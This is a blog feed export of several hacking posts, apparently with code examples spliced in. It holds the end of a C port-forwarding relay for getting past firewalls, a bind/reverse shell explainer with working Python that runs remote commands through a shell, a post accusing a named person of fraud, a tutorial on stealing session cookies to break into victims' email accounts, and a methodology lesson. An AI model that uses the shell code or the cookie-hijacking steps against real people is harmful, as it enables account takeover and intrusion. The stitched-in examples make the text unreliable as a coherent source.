#include &amp;lt;signal.h&amp;gt;


int listen_port, target_port, source_port, verbose;
char target_ip[1024];

void * kp(void *);

void die(int sig)
{
    pthread_exit(NULL);
}

void usage()
{
    printf("kp listen_port target_ip target_port &amp;lt;source_port&amp;gt; &amp;lt;v&amp;gt;\n");
}

int getMax(int q1, int q2)
{
    if (q1 &amp;gt; q2) return q1; else return q2;
}

int main(int argc, char **argv)
{
    int fd, fd1;
    const int on = 1;
    struct sockaddr_in fd_sock, fd_sock1;
    socklen_t listenlen;
    pthread_t ptConnection;

    (void) signal (SIGINT, die);

    verbose = 0;
    source_port = 0;

    if ((argc &amp;lt; 4) || (argc &amp;gt; 6))
    {
        usage();
        exit(1);
    }

    printf("kevproxy\n");

    listen_port = atoi(argv[1]);
    target_port = atoi(argv[3]);
    if (argc &amp;gt; 4) {
        if (strcmp(argv[4], "v") == 0)
        {
            if (argc &amp;gt; 5)
            {
                usage();
                exit(1);
            }
            verbose = 1;
            source_port = 0;
        } else {
            source_port = atoi(argv[4]);
            if (argc &amp;gt; 5)
            {
                if (strcmp(argv[5], "v") == 0)
                {
                    verbose = 1;
                } else {
                    usage();
                    exit(1);
                }
            }
        }
    } else {
        source_port = 0;
    }

    strcpy(target_ip, argv[2]);

    printf("Listening on %d, sending to %s:%d", listen_port, target_ip, target_port);
    if (source_port != 0) {
        printf(", source port %d\n", source_port);
    } else {
        printf("\n");
    }

    // fd_sock is listener
    fd_sock.sin_family = AF_INET;
    fd_sock.sin_port = htons(listen_port);
    fd_sock.sin_addr.s_addr = INADDR_ANY;

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd &amp;lt;0) {
        perror("fd: opening stream socket");
        return -1;
    }
    if (verbose) printf("socket fd made\n");

    if (setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &amp;amp;on, sizeof (on)) != 0)
    {
        perror("fd: setsockopt failed");
    }
    if (verbose) printf("socket fd option set\n");

    if (bind(fd, (struct sockaddr *)&amp;amp;fd_sock, sizeof fd_sock) &amp;lt;0)
    {
        return 0;
    }
    if (verbose) printf("Bound fd!\n");

    if (listen(fd, 1024) &amp;lt; 0)
    {
        return 0;
    }
    if (verbose) printf("fd: listening!\n");

    for (;;)
    {
        // fd_sock1 is the accepted conx
        fd_sock1.sin_family = AF_INET;
        fd_sock1.sin_port = INADDR_ANY;
        fd_sock1.sin_addr.s_addr = INADDR_ANY;
    
        listenlen = sizeof fd_sock1;
        fd1 = accept(fd, (struct sockaddr *)&amp;amp;fd_sock1, &amp;amp;listenlen);

        if (fd1 &amp;lt; 0)
        {
            return 0;
        }
        if (verbose) printf("fd1: accepted!\n");

        /* pass the fd by value: &amp;amp;fd1 would be overwritten by the next
           accept() before a slow thread got round to reading it */
        if (pthread_create (&amp;amp;ptConnection, NULL, kp, (void *)(intptr_t)fd1) != 0)
        {
            perror("could not create thread");
            return 0;
        }
        if (verbose) printf("thread created\n");

        if ( (pthread_detach(ptConnection)) != 0)
        {
            perror("could not detach thread");
        }
        if (verbose) printf("thread detached\n");
    }
}

void closesocks(int sock1, int sock2)
{
    close(sock1);   /* a failing close() (e.g. EBADF) must not spin forever */
    if (verbose) printf("sock1 closed\n");
    close(sock2);
    if (verbose) printf("sock2 closed\n");
}

void * kp(void *fd_in)
{
    fd_set socks;
    int selectret;
    int maxsock;
    int accfd, fd2;
    int num;
    char buff[65100];
    struct sockaddr_in fd_sock2, fd_sock3;

    accfd = (int)(intptr_t) fd_in;

    if (verbose) printf("accfd = %d\n", accfd);

        // fd_sock2 is local port of outbound conx
    fd_sock2.sin_family = AF_INET;
    fd_sock2.sin_port = htons(source_port);
    fd_sock2.sin_addr.s_addr = INADDR_ANY;

    // fd_sock3 is outbound conx
    fd_sock3.sin_addr.s_addr=inet_addr(target_ip);
    fd_sock3.sin_port = htons(target_port);
    fd_sock3.sin_family = AF_INET;

    fd2 = socket(AF_INET, SOCK_STREAM, 0);
    if (fd2 &amp;lt;0) {
        perror("fd2: opening stream socket");
        return NULL;
    }
    if (verbose) printf("socket fd2 made\n");

    if (source_port != 0) {
        if (bind(fd2, (struct sockaddr *)&amp;amp;fd_sock2, sizeof fd_sock2) &amp;lt; 0)
        {
            perror("fd2: bind failed");;
        } else {
            if (verbose) printf("Bound fd2!\n");
        }
    }

    if (connect(fd2, (struct sockaddr *)&amp;amp;fd_sock3, sizeof fd_sock3) &amp;lt; 0)
    {
        perror("fd2: connect");
        return  NULL;
    }
    if (verbose) printf("Connected fd2!\n");

    maxsock = getMax(accfd, fd2);

    while (1) {
        FD_ZERO (&amp;amp;socks);          /* select() rewrites the set, so rebuild it each pass */
        FD_SET (accfd, &amp;amp;socks);
        FD_SET (fd2, &amp;amp;socks);

        selectret = select (maxsock+1, &amp;amp;socks, NULL, NULL, NULL);
        if (selectret == -1)
        {
            perror("select failed");
            break;
        }

        if (FD_ISSET (accfd, &amp;amp;socks))
        {
            num = read(accfd, buff, 65000);
            if (num &amp;lt;=0)
            {
                closesocks(accfd,fd2);
                break;
            }
            if (write(fd2, buff, num) != num)
            {
                perror("fd2 write error");
            }
            if (verbose) printf("accfd -&amp;gt; fd2, %d bytes\n", num);
        }

        if (FD_ISSET (fd2, &amp;amp;socks))
        {
            num = read(fd2, buff, 65100);
            if (num &amp;lt;=0)
            {
                closesocks(accfd,fd2);
                break;
            }
            if (write(accfd, buff, num) != num)
            {
                perror("accfd write error");
            }
            if (verbose) printf("fd2 -&amp;gt; accfd, %d bytes\n", num);
        }

    }
    if (verbose) printf("thread exiting\n");
    pthread_exit(NULL);
    return NULL;
}&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-7232111292099130673?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/BJ-7HnV5Em8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/BJ-7HnV5Em8/exploiting-buggyweak-firewalls.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/05/exploiting-buggyweak-firewalls.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-8762770010971811436</guid><pubDate>Sun, 08 May 2011 04:06:00 +0000</pubDate><atom:updated>2011-05-07T21:06:38.792-07:00</atom:updated><title>Difference between Bind Shell and Reverse Shell</title><description>Let us see the basic differences between a bind shell and a reverse shell.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;&lt;a href="" name="intro"&gt;&lt;/a&gt;What is a Shell&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
A shell is a program that acts as an intermediary between the user and the kernel: it gives the user an interface through which the services of the kernel can be reached.&lt;br /&gt;
&lt;br /&gt;
E.g. bash on Linux, cmd.exe on Windows.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin-top: 5px; margin: 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 82px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;+-----------------+               _______________           +----------------+
| Aneesh          |  Behind NAT  /              /           | Shabbir        |
| With Private ip | ----&amp;gt; ----&amp;gt; /  Internet    /----&amp;gt; ----&amp;gt; | with Public IP |
+-----------------+            /______________/             +----------------+&lt;/pre&gt;&lt;/div&gt;In this scenario Aneesh's computer is on the internet with a private IP behind NAT, while Shabbir's has a public IP. That means Shabbir's system can be reached by anyone on the internet, but Aneesh's cannot: machines on the internet cannot open a connection to a host behind NAT, although that host can still connect out.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Bind Shell&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Suppose Shabbir runs into a problem with his system and needs help from Aneesh. He simply binds his shell (cmd.exe or /bin/bash) to a TCP port and sends Aneesh the port number and other details. Aneesh can then connect to Shabbir's machine and get the shell. So in this case:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Aneesh's end:&lt;/b&gt; connects to Shabbir (acts as the client).&lt;br /&gt;
&lt;b&gt;Shabbir's end:&lt;/b&gt; listens for connections (acts as the server) and attaches his command shell to the accepted socket.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Reverse Shell&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now suppose that some days later Aneesh breaks his system and asks Shabbir for help. This time a bind shell cannot be used, because Aneesh has no public IP and his system is not reachable from the internet. To get around this, Aneesh pushes his shell out to Shabbir: his machine makes an outbound connection, which NAT allows, and attaches the shell to it. So in this case:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Aneesh's end:&lt;/b&gt; connects out to Shabbir and attaches his shell to that connection (acts as the client).&lt;br /&gt;
&lt;b&gt;Shabbir's end:&lt;/b&gt; listens for the incoming connection and then types commands into it (acts as the server).&lt;br /&gt;
&lt;br /&gt;
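The two stories differ only in who calls listen() and who calls connect(). The following Python, added here as an example and not code from the original post, runs both variants on one machine over 127.0.0.1, so the NAT is only simulated: the Aneesh side never opens a listening port. The received commands are run through the system shell, so use it only on a machine you own.

```python
"""Bind shell and reverse shell, both run over 127.0.0.1 on one machine.

Added example for this post; it is not code from the original article. The
NAT from the diagram is only simulated: the 'Aneesh' side never listens, it
only connects out, which is exactly what NAT still allows.
"""
import socket
import subprocess
import threading


def serve_shell(conn):
    """The part that is identical in both variants: read newline-terminated
    commands from an established connection, run them, write the output back.
    Who called listen() and who called connect() is the only difference."""
    with conn:
        buf = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                return
            buf += chunk
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                cmd = line.decode(errors="replace").strip()
                if cmd == "exit":
                    return
                res = subprocess.run(cmd, shell=True, capture_output=True)
                conn.sendall(res.stdout + res.stderr)


def bind_shell(port=0):
    """Shabbir's side of the first story: the shell LISTENS on its own
    address and waits for the helper to connect. Returns the listening port."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]

    def accept_one():
        conn, _ = srv.accept()
        srv.close()
        serve_shell(conn)

    threading.Thread(target=accept_one, daemon=True).start()
    return bound_port


def reverse_shell(host, port):
    """Aneesh's side of the second story: the shell CONNECTS OUT to the
    helper's listener. No inbound port is ever opened on Aneesh's box."""
    conn = socket.create_connection((host, port))
    threading.Thread(target=serve_shell, args=(conn,), daemon=True).start()


def run_command(conn, cmd, timeout=10.0):
    """The helper's keyboard: send one command and read its output."""
    conn.settimeout(timeout)
    conn.sendall(cmd.encode() + b"\n")
    return conn.recv(65536).decode(errors="replace").strip()


def demo_bind():
    """Aneesh connects to Shabbir's bind shell and runs a command."""
    port = bind_shell()
    with socket.create_connection(("127.0.0.1", port)) as operator:
        return run_command(operator, "echo bind-shell-ok")


def demo_reverse():
    """Shabbir listens; Aneesh's reverse shell calls him; Shabbir runs a command."""
    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    reverse_shell("127.0.0.1", listener.getsockname()[1])
    conn, _ = listener.accept()
    listener.close()
    with conn:
        return run_command(conn, "echo reverse-shell-ok")


if __name__ == "__main__":
    print(demo_bind())
    print(demo_reverse())
```

demo_bind() has the helper connect to a listening shell; demo_reverse() has the shell connect out to a listening helper; in both cases the same serve_shell() loop runs the commands once the socket exists. In the reverse case the helper is still the server in TCP terms, which is why a NAT or firewall that blocks inbound connections does not stop it, and why outbound connection monitoring is the place to detect it.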
That's all for this article. I hope readers find it useful.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-8762770010971811436?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/9KziYlnwwZQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/9KziYlnwwZQ/difference-between-bind-shell-and.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/05/difference-between-bind-shell-and.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-2422072113703390044</guid><pubDate>Sun, 08 May 2011 04:06:00 +0000</pubDate><atom:updated>2011-05-07T21:06:15.055-07:00</atom:updated><title>Hacker and Expert</title><description>&lt;h3 class="articleheading"&gt;Hacker and Expert&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
In one of my articles I explained that "there is a difference between a hacker (not an expert) and an information security expert". In this section I try to explain that difference in detail. Always remember my phrase: "an expert can become a hacker, but a hacker cannot become an expert". I will now explain in depth how a hacker is not an expert and what the difference between the two is. A large part of the population wrongly thinks of a hacker as an expert. I want to show that this is false, and I want you to remove this false belief from your mind; indirectly I am trying to change your attitude so that you can understand and accept the right thing. As I mentioned in the previous chapter, children in the age group of 14-16 years are nowadays hacking websites and pulling important information off the internet. The internet is a huge source of information these days, an effectively endless quantity of it: a person surfing for information for a whole lifetime would run out of life long before the internet ran out of information.&lt;br /&gt;
&lt;br /&gt;
Coming to the point: many hackers and institutes claim to be big hackers and present themselves as experts in the information security field in order to sell seminars, workshops, certifications, courses and so on, just to expand their business rapidly. I have more than sufficient evidence against such people and institutes proving that "they might be hackers, but they are not experts". What these people actually do is use the internet to find tools created by experts. The people who create these tools and make them available for others to use are the experts, not the people who use those tools for hacking or other activities to give false proof of their expertise or talent. So self-claimed hackers of this kind are not experts from any point of view.&lt;br /&gt;
&lt;br /&gt;
Not only that: the self-claimed hackers and institutes also trawl educational and university websites for documents, theses, articles and so on that are publicly available to everyone, and copy and paste that readily available material until it turns into a book, study material or reference material. Here again you can see that no expert-level work is performed by such self-claimed hackers and institutes in trying to prove themselves experts: documents, statements, theses, articles and so on prepared by someone else are simply copied into their books, study materials or reference books. I do not know whether that counts as expertise in the eyes of people with changing attitudes, or whether it is simply stealing.&lt;br /&gt;
&lt;br /&gt;
And that is not the limit of the stunts used by self-claimed hackers and institutes. Many of them also create study materials for their so-called security and hacking courses and certifications by filling the whole of the material with topics that do not contain even one percent of information related to hacking or information security. I have gone through many such books and reference materials and found the places from which the data was copied. For example, there is a networking course called MCSE (Microsoft Certified Systems Engineer). Many self-claimed hackers and institutes use the contents of Microsoft's published material, books, tools, presentations, programs and so on for their information security courses, ethical hacking courses, hacking-related books and hacking and security certifications. Now tell me: what is the expertise level of such courses, certifications, books and study materials? So I hope this is enough to explain the difference between "a hacker and an expert".&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;&lt;a href="" name="InformationSecurityandHacking"&gt;&lt;/a&gt;Information Security and Hacking: &lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
In my early days, when I had learned the basic hacking techniques and methods and applied for jobs at many companies, I got very disgusting, insulting and negative replies from many highly reputed companies. I remember that I also used to send my resume to the United Kingdom and the United States, and I am thankful to a person in the United Kingdom to whom I sent my resume, who was the first person to give me this knowledge and experience. He replied: "Don't use the term hacking in any statement that concerns your career, business, education, etc. Here in the UK, people from non-technical, technical and legal fields treat hacking, or a hacker, as part of crime, and instead of giving you a job they may take action against you. I know you might feel bad about such an unexpected reply from me, since your intention is to do good work and help the information security community. But along with this bitter reply, remember that it will be a good lesson for the days to come." After that I received many similar responses from people in senior positions at multinational and reputed companies.&lt;br /&gt;
&lt;br /&gt;
So this is why I am trying to explain that you should not go after terms in which hacking is used. I am explaining this with a caring intention, so that you do not taste the bitter experience I have faced several times. In companies in many countries no one will even sit beside you (sit here meaning keeping any relations or terms), nor is there any chance of getting a job or business from such companies. You will only get career chances and business opportunities when you use the terms of the information security field, which are community-approved terms. The very young generation of students thinks "let's learn hacking" and goes for various kinds of ethical hacking courses which are of no use for a brilliant career; it is only a passion, and the young generation has been misguided by some people for their personal benefit. The terms of the information security field are legal and technical, and they will give you opportunities to build your career, your status and your reputation. Most of all, information security terms will never be disgusting or insulting from any point of view where your career is concerned. So you have to choose which way you want to live your life. For example, the media publishes the names of criminals and also publishes the names of reputed people. Both kinds of people become equally well known to a large population globally through such publicity, but one kind is known for the publicity of his criminal activities and the other for the publicity of his good activities. So you have to decide which list you want your name in: the good one or the bad one.&lt;br /&gt;
&lt;br /&gt;
Now let me introduce one such self-claimed hacker as an example: Ankit Fadia. There are several institutes too in my eyes, but they have not yet spread across the globe. If you search for the keyword 'Ankit Fadia' in Google and go through the first thirty results you will see the reality behind the point I am making in both of my articles. For your ease, I give below some reference sources as evidence that what I say about Ankit Fadia is truth and fact. Please go through these references:&lt;br /&gt;
&lt;br /&gt;
http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/009654.html&lt;br /&gt;
http://en.wikipedia.org/wiki/Talk:Ankit_Fadia&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-2422072113703390044?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/OoQ88MgW-o8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/OoQ88MgW-o8/hacker-and-expert.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/05/hacker-and-expert.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-4184475188972972504</guid><pubDate>Sun, 08 May 2011 04:04:00 +0000</pubDate><atom:updated>2011-05-07T21:04:46.915-07:00</atom:updated><title>How to Hack Email Account with Cookie stealing [For Newbies]</title><description>&lt;b&gt;Cookie Stealing.&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I have noticed that cookie stealing is neglected by some fellow hackers (I was one of them). But recently I found that cookie stealing can be pretty handy for hacking an email account. In the following article I cover the basics of &lt;b&gt;how to hack an email account using cookie stealing.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How to hack an email account:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you are a newbie and don't know what a cookie is: a cookie is a piece of text that a website stores in the user's browser. After login the web server uses one of these cookies, the session cookie, to identify and authenticate the user on every later request, so the password is never sent again. If you steal that cookie from the victim's browser (or off the wire) and inject it into your own browser, the web server cannot tell you from the victim and lets you into their email account. This is called session hijacking, and it is how cookie stealing hacks an email account.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Tools needed for Cookie stealing attack:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Cookie stealing attack requires two types of tools:&lt;br /&gt;
&lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt;Cookie capturing tool&lt;/li&gt;
&lt;li&gt;Cookie injecting/editing tool&lt;/li&gt;
&lt;/ol&gt;&lt;b&gt;1. Cookie capturing tool:&lt;br /&gt;
&lt;br /&gt;
&lt;/b&gt;Suppose your computer and the victim's computer are on the same LAN. You can then use a cookie capturing tool to sniff the packets to and from the victim's computer; some of those packets carry the HTTP Cookie header, and the capturing tool decodes them so you can read the cookie values needed to hijack the email session. Wireshark and HTTP Debugger Pro can both be used to capture cookies. Note that on a switched LAN you only see the victim's traffic if you first put yourself in the path (e.g. by ARP spoofing) or sit on a mirrored port.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;b&gt;Update:&lt;/b&gt;&lt;/span&gt; Check out my Wireshark tutorial for more information on cookie capturing tool.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. Cookie injecting/editing tool:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now, once you have successfully captured your victim's cookies, you have to inject those cookies into your browser. This job is done using a Cookie injecting tool. Also, in certain cases after injection, you need to edit cookies, which can be done with a Cookie editing tool. This cookie injection/editing can be done using the simple Firefox addon &lt;span style="color: #3333ff;"&gt;Add N Edit Cookies&lt;/span&gt; and Greasemonkey scripts. I will write more on these two tools in my future articles.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Drawbacks of Cookie Stealing:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Cookie Stealing is neglected because it has some serious drawbacks:&lt;br /&gt;
&lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt;A cookie has an expiry time, i.e. after a certain trigger the cookie expires and you cannot use it to hijack the victim's session. Cookie expiry is implemented in two ways:&lt;ol style="list-style-type: lower-alpha;"&gt;&lt;li&gt; By assigning a specific timestamp (helpful for us).&lt;/li&gt;
&lt;li&gt;By checking for triggers like the user exiting from the web browser. So, in such cases, whenever the user exits from his browser, his cookie expires and our captured cookie becomes useless.&lt;/li&gt;
&lt;/ol&gt;&lt;/li&gt;
&lt;li&gt; Cookie stealing becomes useless in an SSL encrypted environment, i.e. for https (Secure HTTP) links. But, most Email accounts and social networking sites rarely use https unless the victim has manually set https as the mandatory connection type.&lt;/li&gt;
&lt;li&gt; Also, most cookies expire once the victim hits the LogOut button. So, you have to implement this Cookie stealing hack while the user is logged in. But, I think this is not such a serious drawback because most of us have the habit of checking "Remember Me". So, very few people actually log out of their accounts on their PCs.&lt;/li&gt;
&lt;/ol&gt;So friends, this was a short tutorial on basics of &lt;b&gt;how to hack Email account using Cookie Stealing.&lt;/b&gt;  As I have stated, Cookie stealing has some disadvantages. But, I think  Cookie stealing is a handy way to hack an Email account. In my next  articles, I will post detailed tutorial to hack Facebook and Gmail  accounts using Cookie stealing. If you have any problem in this tutorial  on &lt;i&gt;how to hack Email account using Cookie stealing,&lt;/i&gt; please mention it in comments.&lt;br /&gt;
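The drawbacks listed above are exactly the cookie attributes a site owner controls. As an added check from the defender's side (not part of the original post), the script below parses Set-Cookie headers and reports cookies that lack the Secure flag, lack HttpOnly, or are persistent long enough to survive a browser restart; the three headers and the reference time are constructed sample values.&lt;br /&gt;

```python
"""Audit Set-Cookie headers for the properties session hijacking depends on.

Added example, not from the original post. Sample headers are constructed;
attribute handling follows RFC 6265 (Max-Age takes precedence over Expires).
"""
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# Constructed sample Set-Cookie headers (illustrative only).
SAMPLE_HEADERS = [
    # Persistent and without Secure: survives a browser restart and travels over plain http.
    "SID=abc123; Expires=Wed, 01 Jun 2016 09:37:00 GMT; Path=/",
    # Session cookie (no Expires/Max-Age) but still sent over plain http.
    "PREF=xyz; Path=/; HttpOnly",
    # Hardened: Secure, HttpOnly and a short Max-Age.
    "SSID=def456; Secure; HttpOnly; Max-Age=900; Path=/",
]

# Constructed "current time" so the audit is reproducible offline.
NOW = datetime(2011, 6, 1, 9, 37, tzinfo=timezone.utc)


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attributes).

    Attribute names are lower-cased; flag attributes map to an empty string.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def cookie_lifetime(attrs, now=NOW):
    """Remaining lifetime as a timedelta, or None for a session-only cookie."""
    if "max-age" in attrs:
        return timedelta(seconds=int(attrs["max-age"]))
    if "expires" in attrs:
        return parsedate_to_datetime(attrs["expires"]) - now
    return None


def audit_cookie(header, now=NOW):
    """Return a list of findings (empty means the cookie passes all checks)."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("%s: missing Secure flag, sent over plain http where it can be sniffed" % name)
    if "httponly" not in attrs:
        findings.append("%s: missing HttpOnly flag, readable by page script" % name)
    lifetime = cookie_lifetime(attrs, now)
    if lifetime is not None and lifetime > timedelta(days=1):
        findings.append("%s: persistent cookie valid for %d more days, outlives the browser session"
                        % (name, lifetime.days))
    return findings


if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        for finding in audit_cookie(h) or ["%s: ok" % parse_set_cookie(h)[0]]:
            print(finding)
```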
&lt;br /&gt;
Enjoy Cookie stealing trick to hack Email account...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-4184475188972972504?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/xyhhr7Zx0cI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/xyhhr7Zx0cI/how-to-hack-email-account-with-cookie.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>2</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/05/how-to-hack-email-account-with-cookie.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-8517596579789137042</guid><pubDate>Tue, 22 Feb 2011 11:13:00 +0000</pubDate><atom:updated>2011-02-22T03:13:44.114-08:00</atom:updated><title>Ethical Hacking Class part 2</title><description>&lt;h3 class="articleheading"&gt;Introduction&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
Continuation of Ethical Hacking Basics Class part 1&lt;br /&gt;
&lt;br /&gt;
The Transmission Control Protocol/Internet Protocol (TCP/IP) suite is so  dominant and important to ethical hacking that it is given wide  coverage in this lesson. Many tools, attacks, and techniques that will  be covered throughout this class are based on the use and misuse of  TCP/IP protocol suite. Understanding its basic functions will advance  your security skills. This lesson also spends time reviewing the  attacker’s process and some of the better known methodologies used by  ethical hackers. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;The Attacker’s Process&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
State the process or methodology hackers use to attack networks &lt;br /&gt;
&lt;br /&gt;
Attackers follow a fixed methodology. To beat a hacker, you have to  think like one, so it’s important to understand the methodology. The  steps a hacker follows can be broadly divided into six phases, which  include pre-attack and attack phases: &lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt; Performing Reconnaissance&lt;/li&gt;
&lt;li&gt; Scanning and enumeration&lt;/li&gt;
&lt;li&gt; Gaining access&lt;/li&gt;
&lt;li&gt; Escalation of privilege&lt;/li&gt;
&lt;li&gt; Maintaining access&lt;/li&gt;
&lt;li&gt; Covering tracks and placing backdoors&lt;/li&gt;
&lt;/ol&gt;&lt;br /&gt;
&lt;b&gt;NOTE&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
A denial of service (DoS) might be included in the preceding steps if  the attacker has no success in gaining access to the targeted system or  network. Let’s look at each of these phases in more detail so that you  better understand the steps. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Performing Reconnaissance&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
Reconnaissance is considered the first pre-attack phase and is a  systematic attempt to locate, gather, identify, and record information  about the target. The hacker seeks to find out as much information as  possible about the victim. This first step is considered a passive  information gathering. As an example, many of you have probably seen a  detective movie in which the policeman waits outside a suspect’s house  all night and then follows him from a distance when he leaves in the  car. That’s reconnaissance; it is passive in nature, and, if done  correctly, the victim never even knows it is occurring. &lt;br /&gt;
&lt;br /&gt;
Hackers can gather information in many different ways, and the  information they obtain allows them to formulate a plan of attack. Some  hackers might dumpster dive to find out more about the victim. Dumpster  diving is the act of going through the victim’s trash. If the  organization does not have good media control policies, many types of  sensitive information will probably go directly in the trash.  Organizations should inform employees to shred sensitive information or  dispose of it in an approved way. &lt;br /&gt;
&lt;br /&gt;
Don’t think that you are secure if you take adequate precautions with  paper documents. Another favorite of the hacker is social engineering. A  social engineer is a person who can smooth talk other individuals into  revealing sensitive information. This might be accomplished by calling  the help desk and asking someone to reset a password or by sending an  email to an insider telling him he needs to reset an account.&lt;br /&gt;
&lt;br /&gt;
If the hacker is still struggling for information, he can turn to what  many consider the hacker’s most valuable reconnaissance tool, the  Internet. That’s right; the Internet offers the hacker a multitude of  possibilities for gathering information. Let’s start with the company  website. The company website might have key employees listed,  technologies used, job listings probably detailing software and hardware  types used, and some sites even have databases with employee names and  email addresses. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Scanning and Enumeration&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
Scanning and enumeration is considered the second pre-attack phase. Scanning is the active step of attempting to connect to systems to elicit a response. Enumeration is used to gather more in-depth information about the target, such as open shares and user account information. At this step in the methodology, the hacker is moving from passive information gathering to active information gathering. Hackers begin injecting packets into the network and might start using scanning tools such as Nmap. The goal is to map open ports and applications. The hacker might use techniques to lessen the chance that he will be detected, such as scanning at a very slow rate. As an example, instead of checking for all potential applications in just a few minutes, the scan might take days to verify what applications are running. Many organizations use intrusion detection systems (IDS) to detect just this type of activity. Don’t think that the hacker will be content with just mapping open ports. He will soon turn his attention to grabbing banners. He will want to get a good idea of which versions of software applications you are running. And, he will keep a sharp eye out for down-level software and applications that have known vulnerabilities. An example of down-level software would be Windows 95. &lt;br /&gt;
&lt;br /&gt;
One key defense against the hacker is the practice of deny all. The  practice of the deny all rule can help reduce the effectiveness of the  hacker’s activities at this step. Deny all means that all ports and  applications are turned off, and only the minimum number of applications  and services are turned on that are needed to accomplish the  organization’s goals. &lt;br /&gt;
&lt;br /&gt;
